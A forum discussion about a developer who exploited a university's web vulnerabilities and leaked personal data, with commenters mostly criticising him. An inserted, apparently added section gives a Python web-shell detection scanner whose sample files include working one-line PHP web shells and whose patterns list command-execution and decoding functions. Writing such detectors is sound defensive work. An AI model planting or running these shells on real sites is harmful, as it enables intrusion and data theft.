Amateur pentester exploits client vulnerability, gets his door kicked in by FBI

aftereffector Member Posts: 525
This is why they say that the number one rule of pentesting is to get senior management approval in writing.

In his words: How a whitehat hacked a university and became an FBI target | Ars Technica

Basically, a guy who worked as a developer (for a company that had the University of Maryland as a client) realized that the university had some major security vulnerabilities that exposed a database full of SSNs and other PII. After he realized that his company wasn't planning to do anything about the vulnerability, this guy exploited it and posted some of the information, including the university president's SSN, to Reddit. Then the FBI kicked in his door...
CCIE Security - this one might take a while...

Comments

  • GarudaMin Member Posts: 204
    I didn't read the article. But based on what you wrote, this has nothing to do with getting approval in writing. This is about the ethics of that developer. Even if one is frustrated by the fact that his/her company is not doing anything, it is not right to expose those things the way that developer did.
  • ratbuddy Member Posts: 665
    What an absolute moron. He broke the law, simple as that.
  • iBrokeIT GICSP, GCIP, GXPN, GPEN, GWAPT, GCFE, GCIA, GCIH, GSEC, CySA+, Sec+, eJPT Member Posts: 1,309
    That guy was getting paid as a professional but acted like an amateur in many ways. He certainly had the technical skills and knowledge to be a professional but he lacked the maturity and communication skills to effectively get his point across. I really have a hard time feeling sympathy for him.

    Starting to see this more and more where "IT pros" get too emotionally attached to the network they are paid to manage, leading to their downfall and possibly ruining their careers. Anyone remember Terry Childs?
    2019: GPEN | GCFE | GXPN | GICSP | CySA+ 
    2020: GCIP | GCIA | eCPPT | eWPT | eCTHP

    WGU BS IT-NA | SANS Grad Cert: PT&EH | SANS Grad Cert: ICS Security
  • chopsticks Member Posts: 389
    Agree. That's rule No. 1 before any pentesting can be carried out. It's a regrettable thing because this guy meant well and is talented.
  • NovaHax Member Posts: 502
    He definitely didn't approach it correctly. It may have even been overlooked if he delivered the information to the right person in confidence. But disclosing to Reddit DOES NOT make you a white-hat.
  • stryder144 Senior Member Posts: 1,684
    Pure and simple, he is an idiot. I think he wanted to be congratulated but the information fell on deaf ears. Not an uncommon issue. To take things into his own hands, and posting it publicly, is plain wrong.
    The easiest thing to be in the world is you. The most difficult thing to be is what other people want you to be. Don't let them put you in that position. ~ Leo Buscaglia

  • tpatt100 Member Posts: 2,991
    Sounds like somebody had some issues with not being taken seriously.
  • Shdwmage Member Posts: 374
    He wanted to be hailed a hero like the traitor Edward Snowden. He crossed a line one simply doesn't walk back over. There are many different moronic things he could have done that wouldn't have landed him in as hot of water.

    Truth be told if I found a security breach so severe and it wasn't being addressed I would feel compelled to do something. I'd go the media as an anonymous source, but I wouldn't show them any of the social security numbers or anything like that. Especially in a case of a large amount of valuable data to be exposed.

    Frankly I'm of the belief that all breaches of security leading to the possible leak of data should be reported publicly. So many companies don't care about our privacy, and only worry about their bottom line. The only way it's going to get better is if people start speaking up more. Until it affects their bottom line, most companies won't move on it.
    --
    “Hey! Listen!” ~ Navi
    2013: [x] MCTS 70-680
    2014: [x] 22-801 [x] 22-802 [x] CIW Web Foundation Associate
    2015 Goals: [] 70-410
  • jesseou812 Member Posts: 60
    Shdwmage wrote: »
    He wanted to be hailed a hero like the traitor Edward Snowden. He crossed a line one simply doesn't walk back over. There are many different moronic things he could have done that wouldn't have landed him in as hot of water.

    Truth be told if I found a security breach so severe and it wasn't being addressed I would feel compelled to do something. I'd go the media as an anonymous source, but I wouldn't show them any of the social security numbers or anything like that. Especially in a case of a large amount of valuable data to be exposed.

    Frankly I'm of the belief that all breaches of security leading to the possible leak of data should be reported publicly. So many companies don't care about our privacy, and only worry about their bottom line. The only way it's going to get better is if people start speaking up more. Until it affects their bottom line, most companies won't move on it.

    ^^^ T h i s ^^^
  • Devilry Member Posts: 668
    I don't hardly even know what to say, seems very immature; unprofessional doesn't even begin to describe it.
  • it_consultant Member Posts: 1,903
    I read the whole article with interest, and while I agree that the developer's actions were immature, he was able to hack UMD by googling known PHP scripts called "upload" and found those scripts - from the outside - installed by another hacker. This was after he informed his company of another malicious PHP script he found because he FTP'd the website to his computer and it set off alarm bells on his desktop AV software. In other words, he had to rattle a tree very loudly to get them to pay attention. I would have gone to a newspaper instead of reddit, but I would have gone public.
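The post above describes two findings a defender can reproduce without any exploitation: attacker-dropped "upload" PHP scripts sitting in a web root, and a malicious PHP file that tripped desktop antivirus. The following is an added example written for this page, not code from the Ars Technica article, the university, the developer's company or any poster. It scans PHP sources for the static indicators that web-shell checks key on (dynamic code execution, OS command execution, decoding wrappers, upload handlers, and a request superglobal fed straight into eval/exec). The PHP files and the indicator patterns are constructed samples and assumptions about what counts as suspicious, not artifacts from the UMD incident.

```python
"""Static web-shell indicator scan over a web root (added example)."""
import os
import re
from typing import Dict, List

# Constructed PHP files standing in for a web root. They are written for this
# example only; none of them is an artifact from the incident in the thread.
SAMPLE_WEBROOT: Dict[str, str] = {
    "index.php": "<?php include 'header.php'; echo 'Welcome'; ?>",
    "admin/upload.php": (
        "<?php\n"
        "// unrestricted uploader: no type, size or path checks\n"
        "move_uploaded_file($_FILES['f']['tmp_name'], 'files/' . $_FILES['f']['name']);\n"
        "?>"
    ),
    "files/cmd.php": "<?php if (isset($_REQUEST['c'])) { system($_REQUEST['c']); } ?>",
    "images/.cache.php": "<?php eval(base64_decode($_POST['p'])); ?>",
}

# Indicator patterns. Which constructs count as suspicious is an assumption
# made for this example; tune the lists for the code base you actually run.
INDICATORS: Dict[str, re.Pattern] = {
    "dynamic_exec": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "os_exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "file_upload": re.compile(r"\bmove_uploaded_file\s*\(", re.I),
    # eval/exec whose argument is a request superglobal, possibly through one or
    # more wrapper calls such as base64_decode(...): the shell's command channel.
    "request_to_exec": re.compile(
        r"\b(eval|assert|system|exec|shell_exec|passthru)\s*\(\s*(\w+\s*\(\s*)*\$_(GET|POST|REQUEST|COOKIE)\b",
        re.I,
    ),
}

# File names that the post says were found by simply googling for them.
NAME_HINT = re.compile(r"(upload|shell|cmd|c99|r57)", re.I)


def scan_php(source: str) -> List[str]:
    """Return the names of every indicator that matches the PHP source."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(source)]


def classify(source: str) -> str:
    """Map indicator hits to a verdict.

    'webshell'  : request data reaches eval/exec, or eval is combined with a
                  decoding wrapper (the classic one-liner backdoor shape).
    'suspicious': an exec, decode or upload primitive is present and needs
                  human review (an unrestricted uploader is the entry point
                  that lets a shell be dropped in the first place).
    'clean'     : none of the indicators matched.
    """
    hits = set(scan_php(source))
    if "request_to_exec" in hits or {"dynamic_exec", "obfuscation"} <= hits:
        return "webshell"
    if hits & {"dynamic_exec", "os_exec", "obfuscation", "file_upload"}:
        return "suspicious"
    return "clean"


def scan_webroot(files: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Scan a mapping of relative path -> PHP source and report per file."""
    report: Dict[str, Dict[str, object]] = {}
    for path, source in files.items():
        report[path] = {
            "verdict": classify(source),
            "hits": scan_php(source),
            "name_hint": bool(NAME_HINT.search(os.path.basename(path))),
        }
    return report


def load_webroot(root: str) -> Dict[str, str]:
    """Read every .php file under a real directory into the same mapping shape."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return files


if __name__ == "__main__":
    for path, result in scan_webroot(SAMPLE_WEBROOT).items():
        flag = " (name matches a common shell/uploader name)" if result["name_hint"] else ""
        print(f"{path}: {result['verdict']} {result['hits']}{flag}")
```

Run it against a real tree with `scan_webroot(load_webroot("/var/www/html"))`. The verdicts are indicators, not proof: legitimate admin tooling uses `exec()` and legitimate uploaders use `move_uploaded_file()`, so every "suspicious" hit needs a human to look at the file, its modification time and the access log around it. Findings like these are what you hand to the system owner, or to law enforcement if the owner will not act, rather than something to exploit or publish.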
  • eansdad Member Posts: 775
    it_consultant wrote: »
    I read the whole article with interest, and while I agree that the developer's actions were immature, he was able to hack UMD by googling known PHP scripts called "upload" and found those scripts - from the outside - installed by another hacker. This was after he informed his company of another malicious PHP script he found because he FTP'd the website to his computer and it set off alarm bells on his desktop AV software. In other words, he had to rattle a tree very loudly to get them to pay attention. I would have gone to a newspaper instead of reddit, but I would have gone public.

    You have to remember that even though you know your neighbor has the fake rock where they hide their key next to the door, that doesn't mean you can go inside. I believe it was Adrian Lamo that hacked sites by going through their own links. What this guy did was stupid. He didn't like the speed at which they were fixing the security holes he found, so he decided to poke around some more. He should have chalked up the 1st victory on his resume and left it at that. Maybe applied for or tried to move to a security position to work on this issue. His actions warrant the unemployment regardless of his intentions, simply because if they allowed him to do it then others might try also. He shouldn't be prosecuted, as long as they can back up his story that it was already there and he found it. He might never get a coding job again, but maybe he can parlay his recent publicity into a security position with a firm that is willing to take the time to go over proper procedures and boundaries.
  • aftereffector Member Posts: 525
    Maybe - but I definitely wouldn't hire him for any security job. He strikes me as a vigilante and a liability, not an asset, regardless of his skills.
    CCIE Security - this one might take a while...
  • Bryzey Member Posts: 260
    What about the company?

    It's irresponsible to bury your head in the sand when someone brings a problem to you.. Especially considering how valuable information is these days.
  • colemic Member Posts: 1,568
    He also publicly exposed PII. It might have been just one person (college president) but that is one too many, and it was reckless and irresponsible. Given the visibility of this, he will have the book thrown at him - hard.
    Working on: CCSP, definitely, maybe. On the twitters: @mcole1008
  • it_consultant Member Posts: 1,903
    Bryzey wrote: »
    What about the company?

    It's irresponsible to bury your head in the sand when someone brings a problem to you.. Especially considering how valuable information is these days.

    I lean towards this a little bit too, the problem was he went to reddit - bad move. He should have gone to the State Attorney General or Inspector General or even the police. He had evidence of criminal activity (the uploaded scripts he utilized) so there were other avenues he could have pursued. I am less inclined to think he should have the book thrown at him, the real problem is/was the University.
  • YFZblu Member Posts: 1,462
    Ah, ColdFusion - The gift that keeps on giving. Two thoughts:

    1. I actually feel really bad for his wife, whose life as she knows it is crashing down on her.
    2. Disclosure sucks - I used to get up in arms when I would see things like this during the course of my work. I'm not going to blame him for what he did, because I know how easy it is to get to your tipping point. A smarter move would have been to go to the FBI, IMO.
  • linuxlover Banned Posts: 228
    ^^ Disclosure of confidential data for greater good is one thing, revealing some personal information of your boss is just stupid. How do you ever expect to be working again after something like this? Didn't he think about what's going to happen after he clicks the Send button? Jesus Christ, some people are seriously stupid.
  • bobloblaw Member Posts: 228
    Dumb dumb dumb dumb dumb dumb.
  • MTciscoguy Member Posts: 552
    I have to say, the exuberance of youth has clouded this person's mind. There are better ways to expose security problems without blacklisting yourself for the rest of your life. Technology information has a way of sticking with you forever. This was not a smart move on his part, all of that work down the tubes; even hacking for the greater good is really bad in this day and age.
    Current Lab: 4 C2950 WS, 1 C2950G EI, 3 1841, 2 2503, Various Modules, Parts and Pieces. Dell Power Edge 1850, Dell Power Edge 1950.
  • DAVID Q Member Posts: 25
    This is an example of an individual being stupid-smart and smart-stupid. I myself can somewhat relate to this guy even though I'm not a hacker. I think he meant to use some form of common sense, a combination of logic and emotions, to make the best decision, but being a busy-body and arrogant while seeking fame and attention at the same time dominated this tester's mental make-up when it came to making a life-turning career decision at the end of the day.

    Like I said before, this is a bad case of smart people making dumb decisions. It may even have something to do with emotional intelligence, I don't know; someone tell me?